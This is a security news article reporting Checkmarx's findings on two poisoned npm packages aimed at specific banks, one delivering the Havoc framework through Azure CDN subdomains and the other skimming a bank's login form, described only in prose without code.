In two separate incidents, threat actors recently tried to introduce malware into the software development environment at two different banks via poisoned packages on the Node Package Manager (npm) registry.
Researchers at Checkmarx who observed the attacks believe them to be the first instances of adversaries targeting banks through the open source software supply chain. In a report this week, the vendor described the two attacks as part of larger trend they have observed recently where banks have been the specific targets.
Advanced Techniques and Targeting
“These attacks showcased advanced techniques, including targeting specific components in Web assets of the victim bank by attaching malicious functionalities to it,” Checkmarx said.
The vendor highlighted an April attack its report. In the incident, a threat actor posing as an employee of the target bank uploaded two malicious packages to the npm registry. Checkmarx researchers discovered a LinkedIn profile that suggested the package contributor worked at the target bank, and initially assumed the packages were part of a penetration test the bank was conducting.
The two npm packages contained a pre-install script that executed upon installation on a compromised system. The attack chain unfolded with the script first identifying the operating system of the host system. Then, depending on whether the OS is Windows, Linux, or MacOS, the script decrypted the appropriate encrypted files in the npm package. The attack chain continued with the decrypted files downloading a second-stage payload from an attacker-controlled command-and-control (C2) server.
“The attacker cleverly utilized Azure’s CDN subdomains to effectively deliver the second-stage payload,” Checkmarx said. “This tactic is particularly clever because it bypasses traditional deny list methods, due to Azure‘s status as a legitimate service.” To make the attack even more credible and hard to detect, the threat actor used a subdomain that incorporated the name of the target bank.
Checkmarx’s research showed the second-stage payload to be Havoc Framework, a popular open source penetration testing framework that organizations often use for security testing and auditing. Havoc has become a popular post-exploitation tool among threat actors because of its ability to evade Windows Defender and other standard endpoint security controls, Checkmarx said.
“Deploying the Havoc framework would have given the attacker access to the infected machine inside the bank‘s network,” says Aviad Gershon, security researcher at Checkmarx, in comments to Dark Reading. “From there, the consequences [would have been] dependent on the bank‘s defenses and the attacker‘s abilities and purpose — data theft, money theft, ransomware, etc.”
Specific Victim
The other attack that Checkmarx reported on this week happened in February. Here too, the threat actor — completely separate from the attacker in May — uploaded their own package containing a malicious payload to npm. In this instance, the payload was engineered specifically for the targeted bank. It was designed to hook onto a specific login form element on the bank‘s website and to capture and transmit information that users entered into the form when logging into the site.
Characteristics in both npm packages made them specific not just to the banking industry in general but to the specific banks as well, Gershon says. “The first attack we describe in the blog was obviously targeting a specific bank, falsifying a persona of a bank employee, and using crafted domains which include the bank‘s name,” he says. “Both of these tactics were used in order to gain credibility and lure bank developers to download it.” However, in this case, had another user not related to the bank downloaded the malicious package, they would have also been infected, Gershon adds.
In the second attack, the adversary’s payload targeted a specific and unique HTML element in a specific application of a specific bank, he says. “Hence in this instance this poisoned package would probably not have hurt other users downloading and installing it.” The attacker motive in developing the package was to steal login credentials that users would have entered into the specific HTML element.
Attacks involving the use of poisoned packages on popular open source repositories and package managers such as npm and PyPI have surged in recent years. A study that ReversingLabs conducted earlier this year, in fact, found a 289% increase in attacks on open source repositories since 2018. The goal behind many of these attacks is to sneak malicious code into enterprise software development environments to steal sensitive data and credentials, to surreptitiously install malware, and carry out other malicious activities.
The attacks that Checkmarx reported this week are the first known instances of banks being specific targets in such attacks.